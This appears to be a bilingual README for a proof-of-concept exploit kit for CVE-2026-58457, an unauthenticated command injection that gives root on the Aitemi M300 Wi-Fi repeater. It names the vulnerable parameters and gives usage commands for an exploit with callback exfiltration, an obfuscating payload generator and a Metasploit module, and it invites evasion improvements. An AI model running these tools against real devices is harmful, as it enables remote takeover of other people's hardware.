
PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.
[!WARNING] Dieser Code wird WIE BESEHEN nur für Bildungs- und Forschungszwecke bereitgestellt. Verwenden Sie diesen PoC nicht auf Produktionssystemen, gemeinsam genutzten Umgebungen oder nicht autorisierten Zielen.
- Das Ausführen oder Hosten dieses Codes kann Antiviren-Erkennungen, Sicherheitsüberwachungswarnungen oder rechtliche Konsequenzen auslösen, wenn er missbraucht wird.
- Die Autoren und Repository-Betreiber übernehmen keine Haftung für Schäden, Missbrauch oder illegale Aktivitäten, die aus diesem Code resultieren.
- Verwenden Sie ihn ausschließlich in isolierten Laborumgebungen mit entsprechender Autorisierung. Nur für defensive Forschung, Schwachstellenanalyse und Blue-Team-Tests gedacht.
Im Handler smacfilter_conf existiert eine nicht authentifizierte OS-Befehlsinjektionssicherheitslücke. Die GET-Parameter name, enable und mac werden ungesäubert in einen sprintf()-Aufruf übergeben, der UCI-Befehle konstruiert, die als root ausgeführt werden.
poc.py - Voll ausgestatteter Exploit mit HTTPS-Unterstützung, Wiederholungsversuchen, Timeout und Callback-Exfiltration.val.py - Sicherer, passiver Schwachstellenprüfer (verwendet harmlosen id-Befehl).gen.py - Erweiterter Payload-Generator mit mehreren Verschleierungstechniken.MITIGATIONS.md - Empfohlene Abwehrmaßnahmen.exploit/.pip install requests
python3 val.py --target 192.168.1.100
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
python3 gen.py -c "id" -n 10
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
msfconsole -q -x "reload_all"
Sterne und Beiträge willkommen - insbesondere Verbesserungen von Umgehungen oder zusätzliche Firmware-Varianten.